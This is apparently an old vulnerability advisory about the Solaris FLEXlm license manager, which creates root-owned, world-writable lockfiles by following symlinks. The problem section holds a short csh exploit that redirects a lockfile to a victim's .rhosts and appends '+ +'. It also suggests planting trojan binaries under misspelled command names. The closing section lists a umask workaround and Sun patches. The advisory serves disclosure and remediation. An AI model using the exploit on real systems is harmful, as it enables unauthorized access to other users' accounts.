COMMAND
License Manager
SYSTEMS AFFECTED
Solaris 2.5.1, 2.6
PROBLEM
Joel Eriksson posted following. License Manager on Solaris 2.5.1
tends to make stupid lockfiles owned by root and mode 666. That is
not good, since anyone could create rootowned files which they
then would be able to modify. It's an even bigger problem since it
just takes about a minute 'til the lockfile is created after it's
replaced with a symlink which it follows. Let's take a look at
tmp:
bash$ ls -l /var/tmp/lock*
-rw-rw-rw- 1 root root 0 Oct 21 18:24 /var/tmp/lockESRI
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockISE-TCADd
-rw-rw-rw- 1 root root 0 Oct 21 14:29 /var/tmp/lockalta
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockansysd
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockasterxd
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockhpeesofd
-rw-rw-rw- 1 root root 0 Oct 21 18:46 /var/tmp/locksuntechd
And:
bash$ ls -l /var/tmp/.flexlm
total 2
-rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211
Joel tested the bug by removing lockESRI and making a symlink to
/var/tmp/test, in about a minute the file was created, owned by
root and worldwrite'able.
Roger Harrison added following. He discovered this too. A lock
file locksuntechd is created in /tmp mode 666 owned by root and
group root. Program that is causing the problems is lmgrd FLEXlm
v2.26d or suntechd.
%ls -la /tmp/locksuntechd
-rw-rw-rw- 1 root root 0 Oct 22 12:51 locksuntechd
suntechd is in /opt/SUNWspro/SunTech_License/bin/ There is a log
file that contains some stuff about when the daemon is going up
or down and also if users are exploiting it you can see entries
about the lock file not being available. It is in
/opt/SUNWspro/SunTech_License/license.log
So to exploit it, just remove the locksuntechd file and replace it
with a symlink to a file you want to create. It will not
overwrite existing files from the testing that i did. Then the
link is followed and the new file is created with mode 666
ownership root. You can then delete the symlink and create a new
one to somewhere else and it will work again and again and again.
Users could create .rhosts files, new system webpages, new trojan
binaries with names spelled slightly off that get misspelled often
(finger-fineger, pine-pien, ls-sl) come on.. tell me you never
typed one of those out wrong while you were typing fast!
------
#!/bin/csh -f
# Change target user name before running
# Iconoclast@thepentagon.com 10/98
rm /tmp/locksuntechd
ln -s ~targetuser/.rhosts /tmp/locksuntechd
exit
------
then wait a min and cat + + >> ~targetuser/.rhosts
SOLUTION
Try creating a wrapper shell script that sets the umask before
launching the license manager. If you set it properly, they
won't be world writable (providing that the LM uses
open(filename, O_EXCL | O_CREAT);
The current version is 6.1 which corrects this. The bottom line
is flexlm should NOT be run as root. All these has been addressed
in the following Sun patches:
104217-01: FLEXlm (SUNWlicsw, SUNWlit) 4.1: CERT security advisory patch
104829-01: FLEXlm 4.1: Licensing (SUNWlicsw, SUNWlit) Jumbo Patch for Solaris SPARC
104830-01: FLEXlm Licensing (SUNWlicsw, SUNWlit) Jumbo Patch for Solaris Intel